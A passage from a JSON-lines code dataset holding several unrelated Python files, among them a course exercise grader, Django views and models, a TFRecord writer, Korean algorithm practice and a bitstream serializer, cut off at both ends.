{expected_restaurant}\"\n\n\ndef check_add_rating(student_module):\n \"\"\"`add_rating_to_restaurant` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.add_rating_to_restaurant, n_params=0)\n\n current_rating_count = student_module.models.Rating.select().count()\n student_module.add_rating_to_restaurant()\n new_rating_count = student_module.models.Rating.select().count()\n assert (\n current_rating_count < new_rating_count\n ), f\"Expected number of ratings to go from {current_rating_count} to {current_rating_count + 1}\"\n\n\ndef check_dinner_date_possible(student_module):\n \"\"\"`dinner_date_possible` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.dinner_date_possible, n_params=0)\n\n date_restaurants = student_module.dinner_date_possible()\n expected_date_restaurants = [\n restaurant\n for restaurant in student_module.models.Restaurant.select()\n .where(student_module.models.Restaurant.opening_time <= \"19:00\")\n .where(student_module.models.Restaurant.closing_time >= \"19:00\")\n if any(\n [\n all([i.is_vegan for i in dish.ingredients])\n for dish in restaurant.dish_set.select()\n ]\n )\n ]\n assert set(date_restaurants) == set(\n expected_date_restaurants\n ), f\"Expected dinner date restaurants to be {expected_date_restaurants}\"\n\n\ndef check_add_dish_to_menu(student_module):\n \"\"\"`add_dish_to_menu` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.add_dish_to_menu, n_params=0)\n\n new_dish = student_module.add_dish_to_menu()\n assert new_dish, \"Expected the new dish to be returned\"\n assert \"cheese\" in [\n x.name for x in new_dish.ingredients\n ], \"Expected 'cheese' to be in the ingredients for the new dish\"\n assert (\n student_module.models.Ingredient.select()\n .where(student_module.models.Ingredient.name == \"cheese\")\n .count()\n == 1\n ), \"The ingredient 'cheese' was created twice\"\n\n\ndef setup_data(models):\n models.db.connect()\n models.db.create_tables(\n [\n models.Ingredient,\n models.Restaurant,\n models.Dish,\n models.Rating,\n models.DishIngredient,\n ]\n )\n\n ingredient_data = [\n (\"milk\", True, False, True),\n (\"flour\", True, True, False),\n (\"eggs\", True, False, True),\n (\"bread\", True, True, False),\n (\"beef\", False, False, True),\n (\"tomato\", True, True, True),\n (\"cheese\", True, False, True),\n (\"jellybeans\", True, False, True),\n (\"cod\", True, False, True),\n (\"potato\", True, True, True),\n (\"banana\", True, True, True),\n (\"peanutbutter\", True, True, True),\n (\"aquafaba\", True, True, True),\n (\"eggplant\", True, True, True),\n (\"zuchinni\", True, True, True),\n (\"mushrooms\", True, True, True),\n ]\n\n restaurant_data = [\n (\n (\"Flavortown\", \"2012-01-01\", \"15:00\", \"23:30\"),\n [\n (\"Pancakes a la mode\", 700, (\"milk\", \"flour\", \"eggs\")),\n (\"Bacon burger\", 1200, (\"bread\", \"beef\", \"tomato\", \"cheese\")),\n (\"Omelette du Fromage\", 800, (\"eggs\", \"cheese\")),\n (\"Milk steak\", 1000, (\"beef\", \"milk\", \"jellybeans\")),\n ],\n [\n (5, None),\n (3, \"weird menu\"),\n (2, \"my milk steak was not boiled over hard\"),\n (4, None),\n (5, None),\n ],\n ),\n (\n (\"Freddies Fish\", \"2016-03-01\", \"11:00\", \"18:30\"),\n [\n (\"Fish n Chips\", 900, (\"cod\", \"flour\", \"eggs\", \"potato\")),\n (\"Ketchup-filled fries\", 300, (\"potato\", \"tomato\")),\n (\"Fish Fries\", 800, (\"potato\", \"cod\")),\n ],\n [\n (4, None),\n (3, None),\n (3, None),\n (3, None),\n (1, None),\n (1, None),\n (2, None),\n (1, None),\n ],\n ),\n (\n (\"Petes Peanutbutter Palace\", \"2019-08-02\", \"10:00\", \"17:30\"),\n [\n (\"Banana Pancakes\", 700, (\"milk\", \"flour\", \"eggs\", \"banana\")),\n (\"Elvis burger\", 1200, (\"bread\", \"beef\", \"banana\", \"peanutbutter\")),\n (\"Vegan Pancakes\", 800, (\"banana\", \"aquafaba\", \"peanutbutter\")),\n ],\n [\n (5, None),\n (3, None),\n (5, \"i love peanut butter\"),\n (4, \"not much choice\"),\n (4, None),\n ],\n ),\n (\n (\"Chique Food Boutique\", \"2020-01-01\", \"18:00\", \"23:30\"),\n [\n (\"Fancy Frittata\", 1700, (\"eggs\", \"flour\", \"cheese\", \"tomato\")),\n (\"Ratatouille\", 3200, (\"tomato\", \"zuchinni\", \"eggplant\")),\n (\"Boeuf Bourguignon\", 3300, (\"beef\", \"mushrooms\", \"potato\")),\n ],\n [\n (5, None),\n (5, \"expensive but real good\"),\n (5, None),\n (5, None),\n (5, None),\n (5, None),\n ],\n ),\n ]\n\n ingredient_map = {\n n: models.Ingredient.create(\n name=n, is_vegetarian=is_v, is_vegan=is_vv, is_glutenfree=is_g\n )\n for n, is_v, is_vv, is_g in ingredient_data\n }\n\n for restaurant, dishes, ratings in restaurant_data:\n restaurant = models.Restaurant.create(\n name=restaurant[0],\n open_since=restaurant[1],\n opening_time=restaurant[2],\n closing_time=restaurant[3],\n )\n for dish_data in dishes:\n dish = models.Dish.create(\n name=dish_data[0],\n served_at=restaurant,\n price_in_cents=dish_data[1],\n )\n dish_ingredients = [ingredient_map[x] for x in dish_data[2]]\n dish.ingredients.add(dish_ingredients)\n for rating in ratings:\n models.Rating.create(\n restaurant=restaurant, rating=rating[0], comment=rating[1]\n )\n","repo_name":"WincAcademy/wincpy","sub_path":"wincpy/checks/286787689e9849969c326ee41d8c53c4.py","file_name":"286787689e9849969c326ee41d8c53c4.py","file_ext":"py","file_size_in_byte":8583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"41087424543","text":"import re\r\ns=\"Abc welcome 2Check paT3en ano3ter check3alTd 22Checj B5 8C\"\r\n\r\nlst=s.split()\r\nprint(lst)\r\n\r\nfor items in lst:\r\n patmatched = re.search(r\"(.*[A-Z].*\\d.*)|(\\d{2}[A-Z].*)|(.*\\d{1}.*[A-Z].*)|([A-Z][a-z].*)\",items)\r\n if patmatched:\r\n print(patmatched.group(0))","repo_name":"SNBhushan/BASICS-OF-PYTHON","sub_path":"pyRegex9.py","file_name":"pyRegex9.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8662640676","text":"import jsonlines\n\n\ncenter_dict = dict()\nfor idx in range(1, 4):\n center_dict[idx] = []\n with open('./center_words/' + str(idx) + '.txt', 'r', encoding='utf-8') as f:\n words = f.readlines()\n for w in words:\n center_dict[idx].append(w.strip())\n\ncounter = [0, 0, 0, 0]\nempty = 0\n\nwith jsonlines.open('./data/cleaned_data.json') as reader:\n for item in reader:\n qas = item['qas'][0]\n is_empty = True\n for qa in qas:\n if len(qa['answers']) != 0 and qa['question'] == '中心词':\n center = qa['answers'][0]['text']\n is_empty = False\n if is_empty:\n empty += 1\n continue\n flag = True\n for idx in range(1, 4):\n if center in center_dict[idx]:\n counter[idx] += 1\n flag = False\n break\n if flag:\n print(center)\n counter[0] += 1\n\nprint(counter, empty)\n \n","repo_name":"windszzlang/CBCP_End2End_Causality_Extraction","sub_path":"data/EDA/proportion.py","file_name":"proportion.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"10926014748","text":"'''\r\nCreated on Sep 12, 2018\r\n\r\n@author: connor\r\n'''\r\nfrom collections import defaultdict\r\n\r\ndef fill_dict(file_name):\r\n tracks_dict = defaultdict(list)\r\n current_playlist = \"No Name Given\"\r\n tracks_f = open(file_name)\r\n for text in tracks_f:\r\n text = text.strip()\r\n if text.startswith(\"https://open.spotify.com\"):\r\n tracks_dict[text[31:]].append(current_playlist)\r\n else:\r\n current_playlist = text\r\n return tracks_dict\r\n\r\ndef print_dups(tracks):\r\n print(\"Duplicate Tracks:\")\r\n for track in tracks:\r\n if len(tracks[track]) > 1:\r\n print(track + \" Appears in \" + str(tracks[track]) + \" WebLink: https://open.spotify.com/track/\"+track)\r\n print(\"End of Duplicate Tracks\")\r\n\r\nif __name__ == \"__main__\":\r\n #format for track_list is one line for playlist name, one line for each track, next playlist name...\r\n tracks_file = \"track_list\"\r\n tracks_dict = fill_dict(tracks_file)\r\n print_dups(tracks_dict)\r\n","repo_name":"ConnorBurnsCoder/Spotify_duplicates","sub_path":"dup_finder.py","file_name":"dup_finder.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3527535582","text":"from __future__ import unicode_literals\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Assignment(models.Model):\n status = models.IntegerField(default = 1)\n student = models.ForeignKey(User, related_name=\"student\")\n\n\nclass Task(models.Model):\n title = models.CharField(max_length=50, default=\"\")\n description = models.CharField(max_length=500)\n # A Task can have many assignements\n assignments = models.ManyToManyField(Assignment, related_name=\"assignments\")\n owner = models.ForeignKey(User, related_name=\"owner\")\n created_time = models.DateTimeField(editable=False, auto_now= True)\n modified_time = models.DateTimeField(null=True, blank=True)\n\n # This method is for updating created and modified times on Saving an object\n def save(self, *args, **kwargs):\n ''' On save, update timestamps '''\n if not self.id:\n self.created = timezone.now()\n self.modified = timezone.now()\n return super(Task, self).save(*args, **kwargs)\n","repo_name":"narenaryan/Tasker","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"54"} +{"seq_id":"19971102023","text":"import os\r\nfrom django.conf import settings\r\nfrom django.http import HttpResponse\r\nfrom django.template.loader import get_template\r\nfrom xhtml2pdf import pisa\r\nfrom django.contrib.staticfiles import finders\r\nfrom israel_palma.models import Servicio\r\n\r\n\r\ndef link_callback(uri, rel):\r\n \"\"\"\r\n Convert HTML URIs to absolute system paths so xhtml2pdf can access those\r\n resources\r\n \"\"\"\r\n result = finders.find(uri)\r\n if result:\r\n if not isinstance(result, (list, tuple)):\r\n result = [result]\r\n result = list(os.path.realpath(path) for path in result)\r\n path=result[0]\r\n else:\r\n sUrl = settings.STATIC_URL # Typically /static/\r\n sRoot = settings.STATIC_ROOT # Typically /home/userX/project_static/\r\n mUrl = settings.MEDIA_URL # Typically /media/\r\n mRoot = settings.MEDIA_ROOT # Typically /home/userX/project_static/media/\r\n\r\n if uri.startswith(mUrl):\r\n path = os.path.join(mRoot, uri.replace(mUrl, \"\"))\r\n elif uri.startswith(sUrl):\r\n path = os.path.join(sRoot, uri.replace(sUrl, \"\"))\r\n else:\r\n return uri\r\n\r\n # make sure that file exists\r\n if not os.path.isfile(path):\r\n raise Exception(\r\n 'media URI must start with %s or %s' % (sUrl, mUrl)\r\n )\r\n return path\r\n\r\ndef render_pdf_view(request, id):\r\n template_path = 'reportes/prueba.html'\r\n \r\n if id > 1:\r\n template_path = f'reportes/prueba{id}.html'\r\n \r\n\r\n context = {'usuario': 'esto es desde el contexto'}\r\n #ejemplo de como obtener el contexto desde un modelo\r\n if id == 7:\r\n servicios = Servicio.objects.all()\r\n context = {\"servicios\":servicios,'titulo':'Lista Servicios'}\r\n \r\n # Create a Django response object, and specify content_type as pdf\r\n response = HttpResponse(content_type='application/pdf')\r\n response['Content-Disposition'] = 'inline; filename=\"prueba.pdf\"' # response['Content-Disposition'] = 'attachment; filename=\"report.pdf\"'\r\n # find the template and render it.\r\n template = get_template(template_path)\r\n html = template.render(context)\r\n\r\n # create a pdf\r\n pisa_status = pisa.CreatePDF(\r\n html, dest=response, link_callback=link_callback)\r\n # if error then show some funy view\r\n if pisa_status.err:\r\n return HttpResponse('We had some errors <pre>' + html + '</pre>')\r\n return response","repo_name":"learsixela/caos_total","sub_path":"reportes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36656636842","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\n\nfrom typing import Any\nfrom typing import cast, Union\nfrom typing import Optional # telling the type checker that either an object of the specific type is required, or None is required\nimport time\n\nfrom collections import namedtuple\nfrom scipy.stats import page_trend_test as ptest # \"results\\n L=%.2f, p-value=%.5f, method=%s\" % (r.statistic, r.pvalue, r.method)\n\nclass PageTest:\n \"\"\"Allows Page Trend Test to be performed to compare convegence of two EA's fitnesses.\n - This allows algorithms with different x-axis values to be compared via projection \n onto a unified x-axis.\n - Algorithm results are added problem by problem. \n\n Args:\n\n num_cuts:\n The number of cuts. Typically half the number of rows/problems considered.\n \n max_x:\n Select the maximum x-axis value to go up to.\n \n invert:\n Binary integer value. Rather than conidering algorith results A-B, consider B-A.\n\n \"\"\"\n\n \n\n def __init__(\n self,\n num_cuts: int,\n max_x: Optional[float] = None,\n invert: int = 0,\n problem_labels: Optional[list] = None,\n ):\n \n # # Set number of cuts to half the number of problems\n self.num_cuts = num_cuts\n\n assert invert == 0 or invert == 1, \"Invert must be binary integer\"\n self.invert = invert\n self.max_x = max_x\n self.problem_labels = problem_labels\n\n self.results_so_far = []\n\n\n return\n\n @property\n def matrix(self) -> np.ndarray:\n \"\"\"Fetch the matric of cuts of difference between algorithm convergences\"\"\"\n assert len(self.results_so_far) > 0, \"Need to add some problem results\"\n assert len(self.results_so_far) > self.num_cuts, \"Ensure you have considered more problems than the number of cuts\"\n return [c.cuts_y for c in self.results_so_far]\n\n\n def plot_cuts(self, save: Optional[str] = None, show: int=1):\n \"\"\"Plot the problem convergence and cuts for the algos added so far\"\"\"\n\n y = [c.y for c in self.results_so_far]\n x = [c.cx for c in self.results_so_far] # relative x axis in terms of cuts\n cx = [c.cuts_x for c in self.results_so_far]\n cy = self.matrix\n\n y_flat = np.array(y).flatten()\n ymin = np.min(y_flat)\n ymax = np.max(y_flat)\n\n\n fig, ax = plt.subplots()\n\n for f, arr in enumerate(y):\n \n max = np.max(abs(arr))\n\n if self.problem_labels is None:\n ax.plot(x[f], y[f]/max, label='f%d' % (f), alpha=1)\n else:\n ax.plot(x[f], y[f]/max, label='f%d (%s)' % (f, self.problem_labels[f]), alpha=1)\n\n\n ax.plot(cy[f]/max,'x', color='k', alpha=0.75, markersize=5)\n\n for xx in range(self.num_cuts):\n # ax.plot([xx,xx],[ymin,ymax], '--', color='k', alpha=0.15) # plot line\n ax.plot([xx,xx],[-1,1], '--', color='k', alpha=0.15) # plot line\n\n ax.set_xlabel('cuts')\n if self.invert == 0:\n ax.set_ylabel('normalised fitness{A-B}')\n elif self.invert == 1:\n ax.set_ylabel('normalised fitness{B-A}')\n\n\n handles, labels = ax.get_legend_handles_labels()\n handles.append(mlines.Line2D([], [], color='k', marker='x', markersize=5, label='cuts', linestyle=''))\n ax.legend(handles=handles)\n\n\n if show == 1:\n plt.show()\n\n if save is not None:\n fig.savefig(save, dpi=200)\n\n plt.close(fig)\n return \n\n def test(self):\n \"\"\"Perform Page Trend Test on the problems added so far\"\"\"\n r = ptest(self.matrix)\n print(\"Page Test (%d problems, %d cuts) results: L=%.2f, p-value=%.5f, method=%s\" % (len(self.matrix), self.num_cuts, r.statistic, r.pvalue, r.method))\n print(\" > We assume that if p<0.05 algorithm A converges faster than B, or if p>0.95 algorithm B converges faster than A, otherwise we cannot say anything.\")\n return\n\n\n def add_problem_interp(self, xA: np.ndarray, yA: np.ndarray, xB: np.ndarray, yB: np.ndarray):\n \"\"\" Adds the results from two algorithms.\n - Takes the two evolutionary algorithm curves and creates two new\n interpolated arrays with a unified x axis value.\n - These are the \"c cut points\" used to subtract the results.\n and formulate the A-B trend.\n \"\"\"\n\n # # Ensure the interpolation gives values close to what we are looking for\n l = max(len(xA), len(xB))\n nps = (int(l/self.num_cuts)+1)*self.num_cuts*10\n # print(\"l:\", l, \", nps:\", nps)\n\n # # Make sure the max value is the same between al algo piece wise combos\n if self.max_x is None:\n max_x = max([max(xB), max(xA)])\n # max_x = np.around(max_x, decimals=0)\n else:\n max_x = self.max_x\n\n # # Interpolate to a larger number of points\n new_x = np.linspace(0, max_x, num=nps)\n new_yA = np.interp(new_x, xA, yA)\n new_yB = np.interp(new_x, xB, yB)\n\n # # Cut down to the newer number of points\n cuts = []\n real_c_locs = []\n c_locs = np.linspace(0, max_x, num=self.num_cuts)\n for c in c_locs:\n idx, val = self.find_nearest(new_x, c)\n if self.invert == 0:\n cuts.append(new_yA[idx]-new_yB[idx])\n elif self.invert == 1:\n cuts.append(new_yB[idx]-new_yA[idx])\n real_c_locs.append(val)\n\n # # Apply inversion to y values\n if self.invert == 0:\n y = new_yA-new_yB\n elif self.invert == 1:\n y = new_yB-new_yA\n\n # # \n rel_x = (new_x/np.max(new_x))*(self.num_cuts-1)\n\n\n DataGroup = namedtuple('PageCuts', ['x', 'y', 'cuts_x', 'cuts_y', 'cx'])\n results = DataGroup(new_x, y, c_locs, cuts, rel_x)\n\n self.results_so_far.append(results)\n\n return \n \n\n def add_problem(self, x: np.ndarray, yA: np.ndarray, yB: np.ndarray):\n \"\"\" Adds the results from two algorithms.\n - Takes the two evolutionary algorithm curves.\n - These are the \"c cut points\" used to subtract the results\n and formulate the A-B trend.\n \"\"\"\n\n # # Make sure the max value is the same between al algo piece wise combos\n if self.max_x is None:\n max_x = max(x)\n # max_x = np.around(max_x, decimals=0)\n else:\n max_x = self.max_x\n\n # # Cut down to the newer number of points\n cuts = []\n real_c_locs = []\n c_locs = np.linspace(0, max_x, num=self.num_cuts)\n for c in c_locs:\n idx, val = self.find_nearest(x,c)\n\n if self.invert == 0:\n cuts.append(yA[idx]-yB[idx])\n elif self.invert == 1:\n cuts.append(yB[idx]-yA[idx])\n real_c_locs.append(val)\n\n # # Apply inversion to y values\n if self.invert == 0:\n y = yA-yB\n elif self.invert == 1:\n y = yB-yA\n\n # # cuts on OG x axis\n rel_x = (x/np.max(x))*(self.num_cuts-1)\n\n\n DataGroup = namedtuple('PageCuts', ['x', 'y', 'cuts_x', 'cuts_y', 'cx'])\n results = DataGroup(x, y, c_locs, cuts, rel_x)\n\n self.results_so_far.append(results)\n\n return \n\n def find_nearest(self, array, location):\n \"\"\"Find the index & value of the point in an array clossest to the desired cut location \"\"\"\n array = np.asarray(array)\n idx = (np.abs(array - location)).argmin()\n return idx, array[idx] ","repo_name":"benedictjones/pyeas","sub_path":"pyeas/_pagetest.py","file_name":"_pagetest.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32278554239","text":"from my_tools import Registros\nlogs = ['Security' , 'Application', 'System']\n\nclass do_undo:\n \"\"\" logs de eventos \"\"\"\n def do():\n for log in logs:\n if log == 'Security':\n valor = '512032768'\n else:\n valor = '51183616'\n\n Registros.set(KEYNAME=r'HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\{}'.format(log), t='REG_DWORD', AutoBackupLogFiles=1, MaxSize=valor)\n\n def undo():\n for log in logs:\n Registros.set(KEYNAME=r'HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\{}'.format(log), t='REG_DWORD', AutoBackupLogFiles=0)","repo_name":"iagoofelipe/AutoConfig","sub_path":"AutoConfig3.0.0/src/config/eventlog.py","file_name":"eventlog.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69904351522","text":"import os\n\nimport pandas as pd\nfrom tensorflow.io import read_file\nfrom tensorflow.train import Feature\nfrom tensorflow.train import Example\nfrom tensorflow.train import Features\nfrom tensorflow.io import encode_jpeg\nfrom tensorflow.io import decode_jpeg\nfrom tensorflow.train import Int64List\nfrom tensorflow.train import BytesList\nfrom tensorflow.io import TFRecordWriter\n\n\ndef image_feature(value):\n\t# Returns a bytes_list from a string / byte\n\treturn Feature(\n\t\tbytes_list=BytesList(value=[encode_jpeg(value).numpy()])\n\t)\n\n\ndef int64_feature(value):\n\t# Returns an int64_list from a bool / enum / int / uint\n\treturn Feature(int64_list=Int64List(value=[value]))\n\n\ndef create_example(image, source_age_group, target_age_group):\n\t# Creates a single entry for the tfrecord\n\tfeature = {\"image\": image_feature(image), \"source_age_group\": int64_feature(source_age_group),\n\t \"target_age_group\": int64_feature(target_age_group)}\n\treturn Example(features=Features(feature=feature))\n\n\ndef tf_writer(data: pd.DataFrame, num_tfrecords: int, num_samples: int, tfrecords_dir: str, folder_path: str,\n age_groups: list) -> None:\n\t# Writes each image data to the tfrecord along with the 13 other target ages\n\tfor tfrec_num in range(num_tfrecords):\n\t\tsamples = data.iloc[(tfrec_num * num_samples): ((tfrec_num + 1) * num_samples)]\n\t\twith TFRecordWriter(tfrecords_dir + \"/file_%.2i-%i.tfrec\" % (tfrec_num, len(samples))) as writer:\n\t\t\tfor index, sample in samples.iterrows():\n\t\t\t\timage_path = folder_path + \"/\" + sample[\"img\"]\n\t\t\t\timage = decode_jpeg(read_file(image_path))\n\t\t\t\tfor value in age_groups:\n\t\t\t\t\tif sample[\"age_group\"] != value:\n\t\t\t\t\t\texample = create_example(image, sample[\"age_group\"], value)\n\t\t\t\t\t\twriter.write(example.SerializeToString())\n\n\ndef write_tfrecords(data: pd.DataFrame, job_dir: str = \"..\") -> None:\n\t# Runs the writer function on the data\n\tnum_samples = 4096\n\tnum_tfrecords = data.shape[0] // num_samples\n\ttfrecords_dir = job_dir + \"/tfrecords\"\n\tfolder_path = job_dir + \"/UTKFace\"\n\tage_groups = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n\n\tif data.shape[0] % num_samples:\n\t\tnum_tfrecords += 1 # add one record if there are any remaining samples\n\n\tif not os.path.exists(tfrecords_dir):\n\t\tos.makedirs(tfrecords_dir)\n\n\t# Shuffle the data and then pass it to the writer function\n\ttf_writer(data.sample(frac=1, random_state=12), num_tfrecords, num_samples, tfrecords_dir, folder_path, age_groups)\n","repo_name":"SauravSJK/Face-Aging-using-GAN","sub_path":"Code/write_tfrecords.py","file_name":"write_tfrecords.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"446735014","text":"# Forth\n# 후위 표기법을 스택으로 계산하기\n\n# import sys\n# sys.stdin = open('input.txt', 'r')\n'''\ndef get_result(postfix):\n stack = []\n result = 0\n # num_cnt = 0 # 피연산자 개수\n # cnt = 0 # 연산자 개수\n\n # for i in postfix:\n # if \"0\" <= i <= \"9\":\n # num_cnt += 1\n # else:\n # cnt += 1\n # # 피연산자 개수가 연산자 개수 보다 많지 않다면 오류\n # if not num_cnt > cnt:\n # return \"error\"\n\n for c in postfix:\n # 피연산자 만나면 스택에 넣기\n if \"0\" <= c <= \"9\":\n stack.append(int(c))\n # 연산자 만나면 피연산자 2개 꺼내서 계산\n elif c == \".\":\n break\n\n else:\n # 피연산자 2개가 연산자 1개를 만나면 스택에는 결과가 1개\n if len(stack) >= 2:\n right = stack.pop() # 우항 먼저\n left = stack.pop()\n\n if c == \"+\":\n result = left + right\n elif c == \"-\":\n result = left - right\n elif c == \"*\":\n result = left * right\n elif c == \"/\":\n result = left // right\n # 결과 값을 스택에 push\n stack.append(result)\n else:\n return \"error\"\n\n return stack.pop()\n\nt = int(input())\nfor tc in range(1, t+1):\n postfix = input().split()\n # postfix = ls[:-1]\n\n print(f'#{tc} {get_result(postfix)}')\n'''\n# 미로 찾기\n'''\n# 상하좌우\ndr = [-1, 1, 0, 0]\ndc = [0, 0, -1, 1]\n\ndef dfs(r, c, n):\n # 방문 기록 남길 배열\n visited = [[0]*n for _ in range(n)]\n stack = []\n\n while True:\n # r,c 좌표가 3 이라면 성공, 1반환\n if arr[r][c] == 3:\n return 1\n for d in range(4):\n nr = r + dr[d]\n nc = c + dc[d]\n # 좌표 범위 내이고, 1 (벽)이 아니고, 방문한 곳이 아니라면,\n if 0 <= nr < n and 0 <= nc < n and arr[nr][nc] != 1 and not visited[nr][nc]:\n # 방문 기록 남기기\n visited[nr][nc] = 1\n # 스택에 좌표 push\n stack.append((r, c))\n # 다음 위치로 출발점 바꿔주기\n r, c = nr, nc\n break\n else:\n # 스택에 값이 있다면, 하나 꺼내서 돌아가기\n if stack:\n r, c = stack.pop()\n # 값이 없다면, 중단 ( 갈 수 있는 길 다 감 )\n else:\n break\n # 탈출 실패\n return 0\n\n\nt = int(input())\nfor tc in range(1, t+1):\n n = int(input())\n arr = [list(map(int, input())) for _ in range(n)]\n r, c = 0, 0\n\n for i in range(n):\n for j in range(n):\n # 출발지점 2 의 좌표 저장\n if arr[i][j] == 2:\n r, c = i, j\n print(f'#{tc} {dfs(r, c, n)}')\n'''\n'''\n# 계산기 1\n# 문자열을 후위 표기식으로 바꾸어 계산하기\n\nt = 10\nfor tc in range(1, t+1):\n n = int(input())\n string = list(input())\n\n # 후위 표기식\n postfix = \"\"\n stack = []\n\n for i in range(n):\n if \"0\" <= string[i] <= \"9\":\n postfix += string[i]\n else:\n stack.append(string[i])\n while stack:\n postfix += stack.pop()\n # print(postfix, stack)\n\n # 후위 표기법을 스택으로 계산\n for c in postfix:\n if \"0\" <= c <= \"9\":\n stack.append(int(c))\n else:\n p1 = stack.pop()\n p2 = stack.pop()\n\n result = p1 + p2\n stack.append(result)\n ans = stack.pop()\n\n print(f'#{tc} {ans}')\n'''\n# 백트래킹\n\n# 2806 N-Queen\n\n# 4*4 체스판 퀸 4개 놓기\n# remain : 남은 체스 말 ??\ndef backtracking(row, remain):\n #\n global cnt\n\n # 1. 종료 조건 : n 개를 다 놨을 때\n if row == n and remain == 0:\n cnt += 1\n return\n\n # 2. 재귀 호출\n\n # 현재 행 row 에서 i번째 열에 퀸을 놓을 수 있는가?\n for i in range(n):\n # 기본적으로 놓을 수 있다고 설정\n can_place = True\n # 세로에 퀸이 있는지 검사 (0부터 row 까지, row 위 값없으니까 반복문 종료됨)\n for j in range(row):\n if board[j][i] == 1:\n can_place = False\n break\n # 대각선에 퀸이 있는지 검사\n # 한 칸씩 올라가보기 : j\n for j in range(1, row+1):\n # 좌상\n # -j : 같은 만큼 빼지기 때문\n if row - j >= 0 and i - j >= 0 and board[row-j][i-j]:\n can_place = False\n break\n\n # 우상\n if row - j >= 0 and i + j < n and board[row-j][i+j]:\n can_place = False\n break\n\n # 놓을 수 있는지 검사\n if can_place:\n # 놓을 수 있으면 현재 위치에 놓고 다음 위치로 이동\n board[row][i] = 1\n backtracking(row + 1, remain -1)\n # row 의 i 번째에 있던거 빼기\n board[row][i] = 0\n\nt = int(input())\nfor tc in range(1, t+1):\n n = int(input())\n cnt = 0\n\n # 보드 만들기\n board = [[0] * n for _ in range(n)]\n backtracking(0, n)\n\n print(f'#{tc} {cnt}')\n\n # 2 1 2 입력 시, 1 0 출력\n","repo_name":"ddingdu/Python_Algorithm","sub_path":"SWEA/0215 SWEA.py","file_name":"0215 SWEA.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42181980163","text":"import math\r\nimport struct\r\n\r\nclass Struct(struct.Struct):\r\n\t# cast-like syntax for packing\r\n\tdef __call__(self, value):\r\n\t\treturn self.pack(value)\r\n\r\n\tdef __str__(self):\r\n\t\treturn \"<Struct %s>\" % self.format\r\n\r\nc_bool = Struct(\"?\")\r\nc_float = Struct(\"f\")\r\nc_double = Struct(\"d\")\r\nc_int = Struct(\"i\")\r\nc_uint = Struct(\"I\")\r\n\r\nc_byte = Struct(\"b\")\r\nc_ubyte = Struct(\"B\")\r\nc_short = Struct(\"h\")\r\nc_ushort = Struct(\"H\")\r\nc_long = Struct(\"l\")\r\nc_ulong = Struct(\"L\")\r\nc_longlong = Struct(\"q\")\r\nc_ulonglong = Struct(\"Q\")\r\n\r\nc_int8 = c_byte\r\nc_uint8 = c_ubyte\r\nc_int16 = c_short\r\nc_uint16 = c_ushort\r\nc_int32 = c_long\r\nc_uint32 = c_ulong\r\nc_int64 = c_longlong\r\nc_uint64 = c_ulonglong\r\n\r\nclass c_bit:\r\n\tdef __init__(self, boolean):\r\n\t\tself.value = boolean\r\n\r\n# Note: a ton of the logic here assumes that the write offset is never moved back, that is, that you never overwrite things\r\n# Doing so may break everything\r\nclass BitStream(bytearray):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper().__init__(*args, **kwargs)\r\n\t\tself._write_offset = len(self) * 8\r\n\t\tself._read_offset = 0\r\n\r\n\tdef write(self, arg, compressed=False, allocated_length:\"for fixed-length strings\"=None, length_type:\"for variable-length strings\"=None):\r\n\t\tif isinstance(arg, BitStream):\r\n\t\t\tself._write_bytes(arg)\r\n\t\t\tif arg._write_offset % 8 != 0:\r\n\t\t\t\t# this should work assuming the part after the arg's write offset is completely 0\r\n\t\t\t\tself._write_offset -= 8 - arg._write_offset % 8\r\n\t\t\t\t# in some cases it's possible we've written an unnecessary byte\r\n\t\t\t\tif self._write_offset//8 == len(self)-2:\r\n\t\t\t\t\tdel self[-1]\r\n\t\t\treturn\r\n\t\tif allocated_length is not None or length_type is not None:\r\n\t\t\tself._write_str(arg, allocated_length, length_type)\r\n\t\t\treturn\r\n\t\tif isinstance(arg, (bytes, bytearray)):\r\n\t\t\tif compressed:\r\n\t\t\t\tself._write_compressed(arg)\r\n\t\t\telse:\r\n\t\t\t\tself._write_bytes(arg)\r\n\t\t\treturn\r\n\t\tif isinstance(arg, c_bit):\r\n\t\t\tself._write_bit(arg.value)\r\n\t\t\treturn\r\n\r\n\t\traise TypeError(arg)\r\n\r\n\tdef _write_str(self, str_, allocated_length, length_type):\r\n\t\t# possibly include default encoded lengths for non-variable-length strings (seem to be 33 for string and 66 for wstring)\r\n\t\tif isinstance(str_, str):\r\n\t\t\tencoded_str = str_.encode(\"utf-16-le\")\r\n\t\telse:\r\n\t\t\tencoded_str = 